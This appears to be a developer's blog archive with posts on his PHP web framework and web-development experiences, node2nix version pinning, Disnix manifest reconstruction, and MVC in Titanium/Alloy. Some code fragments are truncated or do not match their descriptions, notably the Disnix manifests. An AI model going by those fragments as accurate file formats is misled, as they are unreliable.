Many web technologies have been standardized by the World Wide Web Consortium (W3C) with the purpose to ensure interoperability among browsers. The W3C also provides online validator services (e.g. for HTML and CSS) that you can use to upload your code and check for its validity.

As an outsider, you may expect that if your uploaded code passes validation, your web application front-end is interoperable and will work properly in all browsers... wrong!

For quite some time, Internet Explorer 6 was the most dominant web browser. Around the time that it was released (2001) it completely crushed its biggest competitor (Netscape) and gained 95% market share. Unfortunately, it did not support modern web standards well (e.g. CSS 2 and newer). After winning the browser wars, Microsoft pretty much stopped its development.

Other browsers kept progressing and started to become much more advanced (most notably Mozilla Firefox). They also followed the web standards more faithfully. Although this was a good development, the sad thing was that in 2007 (6 years later) Internet Explorer 6 was still the most dominant browser, with its lacking support for standards and its many conformance bugs -- as a result, you were forced to implement painful IE-specific workarounds to make your web page work properly.

What I typically did was implement a web page for "decent browsers" first (e.g. Firefox, Chrome, Safari), and then add Internet Explorer-specific workarounds (such as additional stylesheets) on top. By using conditional comments, an Internet Explorer-specific feature that treated certain comments as code, I could ensure that the hacks were not used by any non-IE browser. An example use case is:

<!--[if lt IE 7]><link rel="stylesheet" type="text/css" href="ie-hacks.css"><![endif]-->

The above conditional comment states that if an Internet Explorer version lower than 7 is used, then the provided ie-hacks.css stylesheet should be used. Otherwise, it is treated as a comment and will be ignored.

Fortunately, Google Chrome overtook the role of the most dominant web browser and is developed more progressively, eliminating most standardization problems. Interoperability today is still not a strong guarantee, in particular for new technologies, but it is considerably better than around the time that Internet Explorer still dominated the browser market.

Stakeholder difficulties

Another major challenge are the stakeholders with their different and somewhat conflicting interests.

The most important thing that matters to the end-user is that a web application provides the information they need, that it can be conveniently found (e.g. through a search engine), and that they are not distracted too much. The visual appearance of your web site also matters to some extent (e.g. a dreadful appearance will affect an end user's ability to find what they need, as well as your credibility), but it is typically not as important as most people think.

Most clients (the group of people requesting your services) are mostly concerned with visual effects and features, and not so much with the information they need to provide to their audience.

I still vividly remember a web application that I developed whose contents could be fully managed by the end user with a simple HTML editor. I deliberately kept the editor's functionality simple -- for example, it was not possible in the editor to adjust the style (e.g. the color of the text or background), because I believed that users should simply follow the stylesheet.

Moreover, I have spent substantial amounts of time explaining clients how to write for the web -- they need to structure/organize their information properly, write concisely, and structure/format their text.

Despite all my efforts in bridging the gap between end-users and clients, I still remember that one particular client ran away dissatisfied because of the lack of customization. He moved to a more powerful/flexible CMS, and his new homepage looked quite horrible -- ugly background images, dreadful text colors, entire sentences in capitals, e.g.: "WELCOME TO MY HOMEPAGE!!!!!!".

I had also been in a situation once in which I had to deal with two rivaling factions in an organization -- one being very supportive of my ideas and the other being completely against them. They did not communicate with each other much and I basically had to serve as a proxy between them.

Also, I have worked with designers, which gave me mixed experiences. A substantial group of designers basically assumed that a web page design is the same thing as a paper design, e.g. a booklet.

With a small number of them I had quite a few difficulties explaining that web page designs need to be flexible, and working towards a solution that meets these criteria -- people use all kinds of screen sizes and resolutions, tend to resize their windows, adjust their font sizes, and so on. Making a design that is too static will affect how many users you will attract.

Technology fashions

Web technology is quite sensitive to technological fashions -- every day new frameworks, libraries and tools appear, sometimes for relatively new and uncommon programming languages.

While new technology typically provides added value, you can also quite easily shoot yourself in the foot. Being forced to work around a system's broken foundation is not particularly a fun job.

Two of my favorite examples of questionable technology adoptions are:

  • NoSQL databases. At some point, probably because of success stories from Google, a lot of people considered traditional relational databases (using SQL) not to be "web scale" and massively shifted to so-called "NoSQL databases". Some well known NoSQL databases (e.g. MongoDB) sacrifice properties in service of speed -- such as consistency guarantees.

    In my own experience, for many of the applications that I developed, the relational model made perfect sense. Also, consistency guarantees were way more important than speed benefits. As a matter of fact, most of my applications were fast enough. (As a sidenote: this does not disqualify NoSQL databases -- they have legitimate use cases, but in many cases they are simply not needed).
  • Single threaded event loop server applications (e.g. applications built on Node.js).

    The single threaded event loop model has certain benefits over the traditional thread/process per connection approach -- little memory and multitasking overhead, making it a much better fit for handling large numbers of connections.

    Unfortunately, most people do not realize that there are two sides to the coin -- in a single threaded event loop, the programmer has the responsibility to make sure that it never blocks so that your application remains responsive (I have seen quite a few programmers who simply lack the understanding and discipline to do that).

    Furthermore, whenever something unexpected goes wrong, you end up with an application that crashes completely, making it much more sensitive to disruptions. Also, this model is not a very good fit for computationally intensive applications.

    (Again: I am not trying to disqualify Node.js or the single threaded event loop concept -- they have legitimate use cases and benefits, but it is not always a good fit for all kinds of applications).
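The blocking pitfall can be demonstrated in a few lines of JavaScript -- while synchronous work occupies the single thread, even a timer that is due immediately cannot fire:

```javascript
// In a single threaded event loop, pending callbacks can only run
// after the current synchronous work has finished -- a handler that
// blocks therefore delays every other event.
const order = [];

setTimeout(() => order.push("timer fired"), 0); // due "immediately"

// Simulate a handler doing blocking, CPU-bound work
let sum = 0;
for (let i = 0; i < 5000000; i++) {
  sum += i;
}
order.push("blocking work done");

// Even though its timeout has long expired, the timer callback has
// still not run at this point: order only contains "blocking work done"
```

In a server, the equivalent of the busy loop would be a slow synchronous computation inside a request handler, during which every other connection is starved.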

My own web framework

I have been extensively developing a custom PHP-based web framework between 2002 and 2009. Most of its ideas were born while I was developing a web-based information system to manage a documentation library for a side job. I noticed that there were quite a few complexities that I had to overcome to make it work properly, such as database integration, user authentication, and data validation.

After completing the documentation library, I developed a number of similar-looking information systems with comparable functionality. Over the years, I learned more techniques, recognized common patterns, captured abstractions, and kept improving my personal framework. Moreover, I used my framework for a variety of additional use cases, including web sites for small companies.

In the end, it evolved into a framework providing the following high level components (the boxes in the diagram denote packages, while the arrows denote dependency relationships):

  • php-sbdata. This package can be used to validate data fields and present data fields. It can also manage collections of data fields as forms and tables. Originally this package was only used for presentation, but based on my experience with WebDSL I have also integrated validation.
  • php-sbeditor. This package provides an HTML editor implementation that can be embedded into a web page. It can also optionally integrate with the data framework to expose a field as an HTML editor. When JavaScript is unsupported or disabled, it will fall back to a text area in which the user can directly edit HTML.
  • php-sblayout. This package provides a layout manager that can be used to manage common sections, the menu structure and dynamic sections of a page. A couple of years ago, I wrote a blog post explaining how it came about. In addition to a PHP package, I also created a Java Servlet/JSP implementation of the same concepts.
  • php-sbcrud is my partial solution to the page-screen mismatch problem and combines the concepts of the data management and layout management packages.

    Using the CRUD manager, every data element and data collection has its own URL, such as http://localhost/index.php/books to display a collection of books and http://localhost/index.php/books/1 to display an individual book. By default, data is displayed in view mode. Modifications can be made by appending GET parameters to the URL, such as: http://localhost/index.php/books/1?__operation=remove_book.
  • php-sbgallery provides an embeddable gallery sub application that can be embedded in various ways -- directly in a page, as a collection of sub pages via the layout manager, in an HTML editor, and as a page manager allowing you to expose albums of the gallery as sub pages in a web application.
  • php-sbpagemanager extends the layout manager with the ability to dynamically manage pages. The page manager can be used to allow end-users to manage the page structure and contents of a web application. It also embeds a picture gallery so that users can manage the images to be displayed.
  • php-sbbiblio is a library I created to display my bibliography on my personal homepage while I was doing my PhD research.
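To illustrate the URL convention of php-sbcrud described above, the following sketch (a JavaScript approximation with hypothetical names, not the actual PHP API) dissects such URLs into the addressed data and the requested operation:

```javascript
// Hypothetical sketch of the CRUD URL convention:
//   index.php/books                            -> the collection of books
//   index.php/books/1                          -> an individual book
//   ...?__operation=remove_book                -> a modification operation
function parseCrudUrl(url) {
  const [path, query = ""] = url.split("?");
  const components = path.split("/").filter(c => c !== "" && c !== "index.php");

  const params = {};
  for (const pair of query.split("&")) {
    const [key, value] = pair.split("=");
    if (key) params[key] = value;
  }

  return {
    collection: components[0] || null, // e.g. "books"
    id: components[1] || null,         // e.g. "1", or null for the collection
    operation: params.__operation || null
  };
}

const route = parseCrudUrl("index.php/books/1?__operation=remove_book");
// route: { collection: "books", id: "1", operation: "remove_book" }
```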

By today's standards, the features provided by the above packages are considered old fashioned. Still, I am particularly proud of the following quality properties (some people may consider them anti-features these days):

  • Being as declarative as possible. This means that the usage of JavaScript is minimized and non-essential. Although the framework may not efficiently deal with the page-screen mismatch because of this deliberate choice, it does provide other benefits. For example, the system is still usable when JavaScript has been disabled and even works in text-oriented browsers.
  • Small page sizes. The layout manager allows you to conveniently separate common aspects from page-specific aspects, including external stylesheets and scripts. As a result, the sizes of the rendered pages are relatively small (in particular compared to many modern web sites), making page loading times fast.
  • Very thin data layer. The data manager basically works with primitive values, associative arrays and PDO. It has no strong ties to any database model or an Object-Relational-Mapper (ORM). Although this may be inconvenient from a productivity point of view, the little overhead ensures that your application is fast.


Conclusion

In this blog post, I have explained where my initial enthusiasm for the web came from, my experiences (including the negative ones), and my own framework.

The fact that I am not as passionate about the web anymore did not make me leave that domain -- web-based systems these days are ubiquitous. Today, much of the work I do is system configuration, back-end and architecture related. I am not so active on the front-end side anymore, but I still look at front-end related issues from time to time.

Moreover, I have used PHP for a very long time (in 2002 there were basically not that many appealing alternatives), but I have also used many other technologies, such as Java Servlets/JSP, Node.js, and Django. I have also used many client-side frameworks, such as Angular and React.

I was also briefly involved with the development of WebDSL, an ongoing project in my former research group, but my contributions were mostly system configuration management related.

Although these technologies all offer nice features and in some ways impress me, it has been a very long time since I really felt enthusiastic about anything web related.


Availability

Three years ago, I already published the data manager, layout manager and bibliography packages on my GitHub page. I have now also published the remaining components. They can be used under the terms and conditions of the Apache Software License version 2.0.

In addition to the framework components, I published a repository with a number of example applications that have comparable features to the information systems I used to implement. The example applications share the same authentication system and can be combined together through the portal application. The example applications are GPLv3 licensed.

You may wonder why I published these packages after such a long time. There are a variety of reasons -- I always had the intention to make them open, but when I was younger I focused mostly on code, not on additional concerns such as documenting how the API should be used or providing example cases.

Moreover, in 2002 platforms such as GitHub did not exist yet (there was Sourceforge, but it worked on a project-level and was not as convenient) so it was very hard to publish something properly.

Finally, there are always things to improve and I always run various kinds of experiments. Typically, I use my own projects as test subjects for other projects. I also have a couple of open ideas for which I can use pieces of my web framework. More about this later.

Friday, March 31, 2017

Substituting impure version specifiers in node2nix generated package compositions

In a number of previous blog posts, I have described node2nix, a tool that can be used to automatically integrate NPM packages into the Nix packages ecosystem. The biggest challenge in making this integration possible is the fact that NPM does dependency management in addition to build management -- NPM's dependency management properties conflict with Nix's purity principles.

Dealing with a conflicting dependency manager is quite simple from a conceptual perspective -- you must substitute it by a custom implementation that uses Nix to obtain all required dependencies. The remaining responsibilities (such as build management) are left untouched and still have to be carried out by the guest package manager.

Although conceptually simple, implementing such a substitution approach is much more difficult than expected. For example, in my previous blog posts I have described the following techniques:

  • Extracting dependencies. In addition to the package we intend to deploy with Nix, we must also include all its dependencies and transitive dependencies in the generation process.
  • Computing output hashes. In order to make package deployments deterministic, Nix requires that the output hashes of downloads are known in advance. As a result, we must examine all dependencies and compute their corresponding SHA256 output hashes. Some NPM projects have thousands of transitive dependencies that need to be analyzed.
  • Snapshotting versions. Nix uses SHA256 hash codes (derived from all inputs to build a package) to address specific variants or versions of packages whereas version specifiers in NPM package.json configurations are nominal -- they permit version ranges and references to external artifacts (such as Git repositories and external URLs).

    For example, a version range of >= 1.0.3 might resolve to version 1.0.3 today and to version 1.0.4 tomorrow. Translating a version range to a Nix package with a hash code identifier breaks the ability for Nix to guarantee that a package with a specific hash code yields a (nearly) bit identical build.

    To ensure reproducibility, we must snapshot the resolved version of these nominal dependency version specifiers (such as a version range) at generation time and generate the corresponding Nix expression for the resulting snapshot.
  • Simulating shared and private dependencies. In NPM projects, dependencies of a package are stored in the node_modules/ sub folder of the package. Each dependency can have private dependencies by putting them in their corresponding node_modules/ sub folder. Sharing dependencies is also possible by placing the corresponding dependency in any of the parent node_modules/ sub folders.

    Moreover, although this is not explicitly advertised as such, NPM implicitly supports cyclic dependencies and is able to cope with them because it will refuse to install a dependency in a node_modules/ sub folder if any parent folder already provides it.

    When generating Nix expressions, we must replicate the exact same behaviour when it comes to private and shared dependencies. This is particularly important to cope with cyclic dependencies -- the Nix package manager does not allow them and we have to break any potential cycles at generation time.
  • Simulating "flat module" installations. In NPM versions older than 3.0, every dependency was installed privately by default unless a shared dependency exists that fits within the required version range.

    In newer NPM versions, this strategy has been reversed -- every dependency will be shared as much as possible until a conflict has been encountered. This means that we have to move dependencies as high up in the node_modules/ folder hierarchy as possible, which is an imperative operation -- in Nix this is a problem, because packages cannot be changed after they have been built.

    To cope with flattening, we must compute the implications of flattening the dependency structure in advance at generation time.

With the above techniques, it is possible to construct a node_modules/ directory structure that is nearly identical to what NPM would normally compose.
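The flattening computation mentioned above can be approximated with a simple model. The following sketch (hypothetical, ignoring version ranges and deeper nesting levels) hoists every dependency to the top-level node_modules/ unless a conflicting version of the same package already resides there:

```javascript
// Simplified sketch of NPM >= 3 flat installation planning: hoist each
// dependency to the root node_modules/ unless a different version of
// the same package has already been placed there.
function planFlatInstall(requirements) {
  const toplevel = {}; // name -> version stored in the root node_modules/
  const nested = [];   // dependencies that must stay private to their parent
  for (const { parent, name, version } of requirements) {
    if (!(name in toplevel)) {
      toplevel[name] = version;               // hoist: share it with everyone
    } else if (toplevel[name] !== version) {
      nested.push({ parent, name, version }); // conflict: keep it private
    } // identical version already hoisted: nothing to do
  }
  return { toplevel, nested };
}

const plan = planFlatInstall([
  { parent: "app", name: "semver", version: "5.0.0" },
  { parent: "app", name: "mkdirp", version: "0.5.1" },
  { parent: "mkdirp", name: "semver", version: "4.3.6" } // conflicts with 5.0.0
]);
```

In Nix, a computation of this kind has to happen at expression generation time, because the resulting store paths cannot be rearranged afterwards.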

Impure version specifiers

Even if it would be possible to reproduce the node_modules/ directory hierarchy with 100% accuracy, there is another problem that remains -- some version specifiers always trigger network communication regardless of whether the dependencies have been provided or not, such as:

  { "node2nix": "latest" }
, { "nijs": "git+" }
, { "prom2cb": "github:svanderburg/prom2cb" }

When referring to tags or Git branches, NPM is unable to determine to which version a package resolves. As a consequence, it attempts to retrieve the corresponding packages to investigate them, even when a compatible version already exists in the node_modules/ directory hierarchy.

While performing package builds, Nix takes various precautions to prevent side effects from influencing builds including network connections. As a result, an NPM package deployment will still fail despite the fact that a compatible dependency has already been provided.

In the package builder Nix expression provided by node2nix, I used to substitute these version specifiers in the package.json configuration files by a wildcard: '*'. Wildcards used to work fine for old Node.js 4.x/NPM 2.x installations, but with NPM 3.x flat module installations they became another big source of problems -- in order to make flat module installations work, NPM needs to know to which version a package resolves, to determine whether it can be shared on a higher level in the node_modules/ folder hierarchy or not. Wildcards prevent NPM from making these comparisons, and as a result, some package deployments failed that used to work with older versions of NPM.

Pinpointing version specifiers

In the latest node2nix I have solved these issues by implementing a different substitution strategy -- instead of substituting impure version specifiers by wildcards, I pinpoint all the dependencies to the exact version numbers to which these dependencies resolve. Internally, NPM addresses all dependencies by their names and version numbers only (this also has a number of weird implications, because it disregards the origins of these dependencies, but I will not go into detail on that).

I got the inspiration for this pinpointing strategy from the yarn package manager (an alternative to NPM developed by Facebook) -- when deploying a project with yarn, yarn pinpoints the installed dependencies in a so-called yarn.lock file so that package deployments become reproducible when a system is deployed for a second time.

The pinpointing strategy will always prevent NPM from consulting external resources (under the condition that we have provided the package by our substitute dependency manager first) and always provide version numbers for any dependency so that NPM can perform flat module installations. As a result, the accuracy of node2nix with newer versions of NPM has improved quite a bit.
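The substitution itself boils down to rewriting the dependencies section of a package.json configuration. A simplified sketch (the resolved version numbers are hypothetical):

```javascript
// Simplified sketch of the pinpointing substitution: every impure or
// nominal version specifier (ranges, "latest", Git URLs) is replaced
// by the exact version the dependency resolved to at generation time.
function pinpointDependencies(dependencies, resolvedVersions) {
  const pinned = {};
  for (const name of Object.keys(dependencies)) {
    // resolvedVersions is assumed to be collected while fetching the
    // dependencies, comparable to the entries of a yarn.lock file
    pinned[name] = resolvedVersions[name];
  }
  return pinned;
}

const pinned = pinpointDependencies(
  { "node2nix": "latest", "prom2cb": "github:svanderburg/prom2cb" },
  { "node2nix": "1.2.0", "prom2cb": "1.0.0" } // hypothetical resolutions
);
```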


Availability

The pinpointing strategy is part of the latest node2nix that can be obtained from the NPM registry or the Nixpkgs repository.

One month ago, I gave a talk about node2nix at FOSDEM 2017, summarizing the techniques discussed in my blog posts written so far. For convenience, I have embedded the slides into this web page:

Tuesday, March 14, 2017

Reconstructing Disnix deployment configurations

In two earlier blog posts, I have described Dynamic Disnix, an experimental framework enabling self-adaptive redeployment on top of Disnix. The purpose of this framework is to redeploy a service-oriented system whenever the conditions of the environment change, so that the system can still meet its functional and non-functional requirements.

An important category of events that change the environment are machines that crash and disappear from the network -- when a disappearing machine used to host a crucial service, a system can no longer meet its functional requirements. Fortunately, Dynamic Disnix is capable of automatically responding to such events by deploying the missing components elsewhere.

Although Dynamic Disnix supports the recovery of missing services, there is one particular kind of failure I did not take into account. In addition to the potentially crashing target machines that host the services of which a service-oriented system consists, the coordinator machine that initiates the deployment process and stores the deployment state could also disappear. When the deployment state gets lost, it is no longer possible to reliably update the system.

In this blog post, I will describe a new addition to the Disnix toolset that can be used to cope with these kinds of failures by reconstructing a coordinator machine's deployment configuration from the meta data stored on the target machines.

The Disnix upgrade workflow

As explained in earlier blog posts, Disnix requires three kinds of deployment models to carry out a deployment process: a services model capturing the components of which a system consists, an infrastructure model describing the available target machines and their properties, and a distribution model mapping services in the services model to target machines in the infrastructure model. By writing instances of these three models and running the following command-line instruction:

$ disnix-env -s services.nix -i infrastructure.nix -d distribution.nix

Disnix will carry out all activities necessary to deploy the system: building the services and their intra-dependencies from source code, distributing the services and their intra-dependencies, and activating all services in the right order.

When changing any of the models and running the same command-line instruction again, Disnix attempts to upgrade the system by only rebuilding the aspects that have changed, deactivating the obsolete services and activating the new ones.

Disnix (as well as other Nix-related tools) attempts to optimize a redeployment process by only executing the steps that are required to reach the new deployment state. In Disnix, the building and distribution steps are optimized due to the fact that every package is stored in isolation in the Nix store, in which each package has a unique filename with a hash prefix, such as:

/nix/store/acv1y1zf7w0i6jx02kfa6gxyn2kfwj3l...-firefox

As explained in a number of earlier blog posts, the hash prefix (acv1y1zf7w0i6jx02kfa6gxyn2kfwj3l...) is derived from all the inputs used to build the package, including its source code, build script, and the libraries that it links to. That, for example, means that if we upgrade a system and none of the inputs of Firefox change, we get an identical hash, and if such a package build already exists, we do not have to build it or transfer the package from an external site again.

The building step in Disnix produces a so-called low-level manifest file that is used by tools executing the remaining deployment activities:

<?xml version="1.0"?>
<manifest version="1">

The above manifest file contains the following kinds of information:

  • The distribution element section maps Nix profiles (containing references to all packages implementing the services deployed to the machine) to target machines in the network. This information is used by the distribution step to transfer packages from the coordinator machine to a target machine.
  • The activation element section contains elements specifying which service to activate on which machine in the network including other properties relevant to the activation, such as the type plugin that needs to be invoked that takes care of the activation process. This information is used by the activation step.
  • The targets section contains properties of the machines in the network and is used by all tools that carry out remote deployment steps.
  • There is also an optional snapshots section (not shown in the code fragment above) that contains the properties of services whose state needs to be snapshotted, transferred and restored in case their location changes.

When a Disnix (re)deployment process successfully completes, Disnix stores the above manifest as a Disnix coordinator Nix profile on the coordinator machine for future reference, with the purpose of optimizing the next upgrade -- when redeploying a system, Disnix compares the generated manifest with the manifest of the previous deployment, and only deactivates services that have become obsolete and activates services that are new, making upgrades more efficient than fresh installations.
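Conceptually, this comparison boils down to a set difference on the activation mappings of the two manifests. The following sketch illustrates the idea (a simplification made up for illustration; the property names are assumptions and this is not Disnix's actual implementation):

```javascript
// Conceptual sketch: determine which services to deactivate and which to
// activate by comparing the previous and the new activation mappings.
// Each mapping is identified here by a (service, target, container) key.
function compareManifests(previous, current) {
    const key = (m) => m.service + "|" + m.target + "|" + m.container;
    const previousKeys = new Set(previous.map(key));
    const currentKeys = new Set(current.map(key));

    return {
        // present in the old deployment, gone in the new one: deactivate
        deactivate: previous.filter((m) => !currentKeys.has(key(m))),
        // present in the new deployment, absent in the old one: activate
        activate: current.filter((m) => !previousKeys.has(key(m)))
    };
}
```

Mappings that appear in both manifests are left untouched, which is exactly what makes an upgrade cheaper than a fresh installation.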

Unfortunately, when the coordinator machine storing the manifests gets lost, then also the deployment manifest gets lost. As a result, a system can no longer be reliably upgraded -- without deactivating obsolete services, newly deployed services may conflict with services that are already running on the target machines preventing the system from working properly.

Reconstructible manifests

Recently, I have modified Disnix in such a way that the deployment manifests on the coordinator machine can be reconstructed. Each Nix profile that Disnix distributes to a target machine includes a so-called profile manifest file, e.g. /nix/store/aiawhpk5irpjqj25kh6ah6pqfvaifm53-test1/manifest. Previously, this file only contained the Nix store paths to the deployed services and was primarily used by the disnix-query tool to display the installed set of services per machine.

In the latest Disnix, I have changed the format of the profile manifest file to contain all the required meta data, so that the activation mappings can be reconstructed on the coordinator machine:

[{ target = "test2"; container = "process"; _key = "4827dfcde5497466b5d218edcd3326327a4174f2b23fd3c9956e664e2386a080"; } { target = "test2"; container = "process"; _key = "b629e50900fe8637c4d3ddf8e37fc5420f2f08a9ecd476648274da63f9e1ebcc"; } { target = "test1"; container = "process"; _key = "d85ba27c57ba626fa63be2520fee356570626674c5635435d9768cf7da943aa3"; }]

The above code fragment shows a portion of the profile manifest. It has a line-oriented structure in which every 7 lines represent the properties of a deployed service. The first line denotes the name of the service, the second line the Nix store path, the third line the Dysnomia container, the fourth line the Dysnomia type, the fifth line the hash code derived from all its properties, the sixth line whether the attached state must be managed by Disnix, and the seventh line an encoding of the inter-dependencies.
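The 7-lines-per-service layout can be illustrated with a small parsing sketch (a simplified approximation for illustration; the field names and the sample values in the test are made up, and this is not Disnix's actual parser):

```javascript
// Sketch: parse a profile manifest in which every group of 7 lines
// describes one deployed service (field order taken from the description
// above; property names are illustrative).
function parseProfileManifest(text) {
    const lines = text.trim().split("\n");
    const services = [];
    for (let i = 0; i + 6 < lines.length; i += 7) {
        services.push({
            name: lines[i],              // name of the service
            pkg: lines[i + 1],           // Nix store path
            container: lines[i + 2],     // Dysnomia container
            type: lines[i + 3],          // Dysnomia type
            key: lines[i + 4],           // hash derived from all properties
            stateful: lines[i + 5] === "true", // state managed by Disnix?
            dependsOn: lines[i + 6]      // encoding of the inter-dependencies
        });
    }
    return services;
}
```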

The other portions of the deployment manifest can be reconstructed as follows: the distribution section can be derived by querying the Nix store paths of the installed profiles on the target machines, the snapshots section by checking which services have been marked as stateful and the targets section can be directly derived from a provided infrastructure model.

With the augmented data in the profile manifests on the target machines, I have developed a tool named disnix-reconstruct that can reconstruct a deployment manifest from all the meta data the manifests on the target machines provide.

I can now, for example, delete all the deployment manifest generations on the coordinator machine:

$ rm /nix/var/nix/profiles/per-user/sander/disnix-coordinator/*

and reconstruct the latest deployment manifest, by running:

$ disnix-reconstruct infrastructure.nix

The above command resolves the full paths to the Nix profiles on the target machines, then downloads their intra-dependency closures to the coordinator machine, reconstructs the deployment manifest from the profile manifests and finally installs the generated deployment manifest.

If the above command succeeds, then we can reliably upgrade a system again with the usual command-line instruction:

$ disnix-env -s services.nix -i infrastructure.nix -d distribution.nix

Extending the self-adaptive deployment framework

In addition to reconstructing deployment manifests that have gone missing, disnix-reconstruct offers another benefit -- the self-adaptive redeployment framework described in the two earlier blog posts is capable of responding to various kinds of events, including redeploying services to other machines when a machine crashes and disappears from the network.

However, when a machine disappears from the network and reappears at a later point in time, Disnix no longer knows about its configuration, which could have disastrous results when the machine rejoins the network.

Fortunately, by adding disnix-reconstruct to the framework we can solve this issue:

As shown in the above diagram, whenever a change in the infrastructure is detected, we reconstruct the deployment manifest so that Disnix knows which services are deployed to each machine. Then, when the system is being redeployed, the services on the reappearing machines can also be upgraded or undeployed completely, if needed.

The automatic reconstruction feature can be used by providing the --reconstruct parameter to the self adapt tool:

$ dydisnix-self-adapt -s services.nix -i infrastructure.nix -q qos.nix \
    --reconstruct

In this blog post, I have described the latest addition to Disnix: disnix-reconstruct, which can be used to reconstruct the deployment manifest on the coordinator machine from the meta data stored on the target machines. With this addition, we can still update systems if the coordinator machine gets lost.

Furthermore, we can use this addition in the self-adaptive deployment framework to deal with reappearing machines that already have services deployed to them.

Finally, besides developing disnix-reconstruct, I have reached another stable point. As a result, I have decided to release Disnix 0.7. Consult the Disnix homepage for more information.

Sunday, February 12, 2017

MVC lessons in Titanium/Alloy

A while ago, I ported the simple-xmpp library from the Node.js ecosystem to Appcelerator Titanium to enrich our company's product line with chat functionality. In addition, I have created a bare bones example app that exposes most of the library's features.

Although I am not doing that much front-end development these days, nor do I consider myself a Titanium guru, I have observed that it is quite challenging to keep your app's code and organization clean.

In this blog post, I will report on my development experiences and describe the architecture that I have derived for the example chat application.

The Model-View-Controller (MVC) architectural pattern

Keeping the code of an end-user application sane is not unique to mobile applications or a specific framework, such as Titanium -- it basically applies to any system with a graphical user interface including desktop applications and web applications.

When diving into the literature, or just searching the Internet, you will most likely stumble upon a very common "solution" -- there is the Model-View-Controller (MVC) architectural pattern that can be used as a means to keep your system structured. It is a generically applicable pattern implemented by many kinds of libraries and frameworks for all kinds of domains, including the mobile application space.

The idea behind this pattern is that a system will be separated into three distinct concerns: the model, the view and the controller. The meanings of these concerns are somewhat ambiguously defined. For example, the design patterns book written by the Gang of Four (Erich Gamma, Richard Helm, Ralph Johnson and John Vlissides) says:

MVC consists of three kinds of objects. The Model is the application object, the View is its screen presentation, and the Controller defines the way the user interface reacts to user input.

The "problem" I have with the above explanation is that it is a bit difficult to grasp the meaning of an "application object". Moreover, the definition of the controller object used in the explanation above states that it only has a relation with the user interface (a.k.a. the view), while I could also think of many scenarios in which external events are involved without invoking the user interface. I have no idea how to categorize these kinds of interactions by looking at the above description.

The paper that the book cites: "A Cookbook for Using the Model-View-Controller User Interface Paradigm in Smalltalk-80" (written by: Glenn E. Krasner and Stephen T. Pope) provides more detailed definitions. For example, it defines the model as:

The model of an application is the domain-specific software simulation or implementation of the application's central structure.

I particularly find the term "domain-specific" important -- it suggests that a model should encapsulate what matters to the problem domain, without any obfuscations of things not related to it, for example, user interface components.

The paper defines the view as follows:

In this metaphor, views deal with everything graphical: they request data from their model, and display the data

The above definition suggests that views are everything about presentation of objects belonging to the model.

Finally, the paper defines controllers as follows:

Controllers contain the interface between their associated models and views and the input devices (e.g., keyboard, pointing device, time)

In contrast to the design patterns book's definition of a controller, this definition also suggests that a controller has a relationship with the model. Moreover, it does not say anything about interactions with a physical user. Instead, it refers to input devices.

Although the paper provides more detailed definitions, it still remains difficult to draw a hard line from my perspective. For example, what is the scope of MVC? Should it apply to an entire system, or can it also be applied to components of which a system consists?

For example, in an earlier blog post about some of my experiences with web development, I described a simple MVC-based library managing the layouts of web applications. Its model basically encapsulates the structure of a web application from an abstract point of view, but it only applies to a specific sub-concern, not the system as a whole.

Despite its unclarities and ambiguities, I still think MVC makes sense, for the following reasons:

  • View and controller code clutters the model with obfuscations making it much harder to read and maintain.
  • There are multiple ways to present an object visually. With a clear separation between a model and view this becomes much more flexible.
  • In general, more compact modules (in terms of lines of code) are in many ways better than having many lines of code in one module (for example, for readability and maintainability). Separation of concerns stimulates a reduction of module sizes.

The Titanium and Alloy frameworks

As explained earlier, I have implemented the chat example app using the Titanium and Alloy frameworks.

Titanium is a framework targeting multiple mobile app platforms (e.g. Android, iOS, Windows and mobile web applications) using JavaScript as an implementation language, providing a unified API with minor platform differences. In contrast to platforms such as Java, Titanium is not a write once, run anywhere approach, but a code reuse approach -- according to their information, between 60 and 90% of the code can be reused among target platforms.

Moreover, the organization of Titanium's API makes a clear distinction between UI and non-UI components, but does not force anyone to strictly follow an MVC-like organization while implementing an application.

Alloy is a declarative MVC-framework that wraps around Titanium. To cite the Alloy documentation:

Alloy utilizes the model-view-controller (MVC) pattern, which separates the application into three different components:

  • Models provide the business logic, containing the rules, data and state of the application.
  • Views provide the GUI components to the user, either presenting data or allowing the user to interact with the model data.
  • Controllers provide the glue between the model and view components in the form of application logic.

(As may be noticed, the above description introduces yet another slightly different interpretation of the MVC architectural pattern.)

The Alloy framework uses a number of very specific technologies to realize an MVC organization:

  • For the models, it uses the backbone.js framework's model instances to organize the application's data. The framework supports automatic data binding to view components.
  • Views use an XML data encoding capturing the static structure of the view. Moreover, the style of each view is captured in a TSS stylesheet (having many similarities with CSS).
  • The controllers are CommonJS modules using JavaScript as an implementation language.

Furthermore, the directory structure of an Alloy application also reflects separation of concerns -- each unit of an application stores each concern in a separate directory and file. For example, in the chat app, we can implement each concern of the contacts screen by providing the following files:

app/views/contacts.xml
app/controllers/contacts.js
app/styles/contacts.tss
The above files reflect each concern of the contacts screen, such as the view, the controller and the style.

In addition to defining models, views, styles and controllers on unit-level, the app unit captures general properties applying to the app as a whole.

Organizing the example chat app

Despite the fact that the Alloy framework facilitates separation of concerns to some degree, I still observed that keeping the app's code structure sane remains difficult.

Constructing views

An immediate improvement of Alloy over plain Titanium is that the view code in XML is much easier to read than constructing UI components in JavaScript -- the nesting of XML elements reflects the structure of the UI. Furthermore, the style of the UI elements can be separated from the layout, improving the readability even further.

For example, the following snippet shows the structure of the login screen:

<Window class="container">
    <ScrollView>
        <View>
            <Label>Web socket URL</Label>
            <TextField id="url" hintText="ws://localhost:5280/websocket/" />
        </View>
        <View>
            <Label>Username</Label>
            <TextField id="username" hintText="sander" />
        </View>
        <View>
            <Label>Domain name</Label>
            <TextField id="domain" hintText="localhost" />
        </View>
        <View>
            <Label>Resource</Label>
            <TextField id="resource" hintText="" />
        </View>
        <View>
            <Label>Password</Label>
            <TextField id="password" passwordMask="true" hintText="" />
        </View>
        <Button onClick="doConnect">Connect</Button>
    </ScrollView>
</Window>
As may be observed, by reading the above code fragment, it becomes quite obvious that we have a window with a scroll view inside. Inside the scroll view, we have multiple views containing a label and text field pair, allowing users to provide their login credentials.

Although implementing most screens in XML is quite straightforward, as their structures are mostly static, I have noticed that Alloy's technologies are not particularly useful for dynamically composing screen structures, such as the contacts overview displaying a row for each contact -- the structure of this table changes whenever a contact gets added or removed.

To dynamically compose a screen, I still need to write JavaScript code in the screen's controller. Furthermore, UI elements composed in JavaScript do not take the style settings of the corresponding TSS file into account. As a result, we need to manually provide styling properties while composing the dynamic screen elements.

